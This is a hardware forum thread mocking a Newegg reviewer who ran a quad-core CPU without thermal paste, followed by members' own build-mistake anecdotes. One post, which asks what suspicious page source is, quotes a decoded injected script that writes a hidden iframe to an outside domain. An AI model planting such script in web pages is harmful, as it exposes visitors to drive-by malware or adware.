Wow.Pros: This processor seemed like a good buy. It is 45 nm and a good clock speed. It should be relatively easy to OC. Vista64 runs quick and responsive, almost flawless in Oblivion at maxed settings.
Cons: My particular chip runs very hot. I am not using thermal paste, but i am using an Arctic 7 freezer pro cooler and a good case. My idle temps are 50-60 celcius and load temps hit 70. I expected it to be at least 10 degrees cooler... now i'm afraid to OC.
Other Thoughts: It could be i didn't install it properly... but thats pretty unlikely. All of the cores run at the same temp, with core 0 about 5 degrees hotter.
Crazy Newegg reviewers.........
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So im looking to buy a Q9450 and i was reading reviews on Newegg, this one really caught my eye so i felt like i had to share it with everyone:
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What a complete and utter noob >_>
Why would they boldly proclaim such a stupid feat!
Shows how good intel are though if that thing is running ok with practically no thermal contact!
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Why would they boldly proclaim such a stupid feat!
Shows how good intel are though if that thing is running ok with practically no thermal contact!
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Maybe he cooks breakfast on the cpu, too!!








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Re: Crazy Newegg reviewers.........
wow that guys is almost as bad as me - when i came home from the bar and decided to swap out video cards and forgot to shut down the computer first.. well maybe i didnt forget and was just in a hurry... stupid beer. lol 

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Re: Crazy Newegg reviewers.........
I bet he put "Tech level: High"
You would think that someone who is willing to pay that much for a processor would take the time to find out how to install the damn thing. I hope he burns it out.
You would think that someone who is willing to pay that much for a processor would take the time to find out how to install the damn thing. I hope he burns it out.
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nice nice ^^
Well I changed fans in my case once and accidentially removed the fan connector of the CPU
It ran well for 5 min and then just crashed. I didn't realise what was going on though. so I tried to start is again with just a blank screen. After opening the case it kinda smelled funny and I noticed the connector hanging in mid air
. Ah well my 6000 is still running^^
Well I changed fans in my case once and accidentially removed the fan connector of the CPU



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Re: Crazy Newegg reviewers.........
lucky for him you can get away with no thermal paste on these 45nm processors... I forgot to plug in the water cooler one time and ran about 20 minutes of benchmarks at 100% CPU load on a QX9770 and it didn't even throttle with just the CPU waterblock... Processors these days are almost fool proof... I bet money that guy left the plastic on the bottom of the CPU cooler too ;)
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The Arctic Cooling Freezer 7 Pro came with thermal paste pre-applied... Did he wipe it off the heatsink?
Switched processors yesterday (E2160 -> E7200) and it kept locking up on boot-up. Apparently, I forgot to plug the EPS/ATX12V 4 pin back in (had to take it out so I could install the heatsink properly).
At least I didn't forget the thermal paste. 
But darn, stock HSF for E7200 is half the height of the one which came with my E2160.
Switched processors yesterday (E2160 -> E7200) and it kept locking up on boot-up. Apparently, I forgot to plug the EPS/ATX12V 4 pin back in (had to take it out so I could install the heatsink properly).


But darn, stock HSF for E7200 is half the height of the one which came with my E2160.
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Re: Crazy Newegg reviewers.........
its like when I put a Pop Tart in the microwave...and the microwave blew up...why? because I thought taking it out of the wrapper would not do good...
I had to leave a review on there just to call him a noob
..whether they post it is another story lol...that was just rather ignorance on his part...I cant stand ignorance lmao..was a good read at least..hell id expect you guys to clown me if i did something nutty like that..Id clown myself too


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I thought you were supposed to leave the plastic on to protect the finishApoptosis wrote: I bet money that guy left the plastic on the bottom of the CPU cooler too ;)

Re: Crazy Newegg reviewers.........
Oh great. I bet the Newegg poster avoid the TIM paste due to this warning of it being too thick. So he removed it all together and mounded the cooler.
I hate the Intel plastic push-in twist pins. Dumb cheapo ITW products.
I hate the Intel plastic push-in twist pins. Dumb cheapo ITW products.
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Re: Crazy Newegg reviewers.........
Those spammers sure are getting good at what they do...found some nasty hexcode in the source code that translates to something like so I'm guessing it's some sort of spy or adware of one form or another...any enlightenments from the Java pros?
EDIT: didn't want to imply supremelaw is necessarily a spammer, a quick google search reveals loads of problems with the similar obfuscated code on other sites. When I say spammer, I meant the person who put that code there which from the looks of other sites probably wasn't supremelaw...
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eval(unescape("document.write('<iframe src="http://orentraff.cn/in.cgi?5" width="0" height="0" style="display:none"></iframe>');"));
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EDIT: didn't want to imply supremelaw is necessarily a spammer, a quick google search reveals loads of problems with the similar obfuscated code on other sites. When I say spammer, I meant the person who put that code there which from the looks of other sites probably wasn't supremelaw...
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Re: Crazy Newegg reviewers.........
LOL I had a guy at work who build his own system at home and was freaking out cause his CPU was running at 65-75c and he has a HUGE heat sink on it. I go and find that he hadn't removed the protective plastic film on the contact part of the the heat sink =)
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Did the plastic melt to the heatsink?
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Actually it didn't. I just pealed it off leaving a nice clean mating surface. The look on his face for making such a bone headed mistake though was priceless =)
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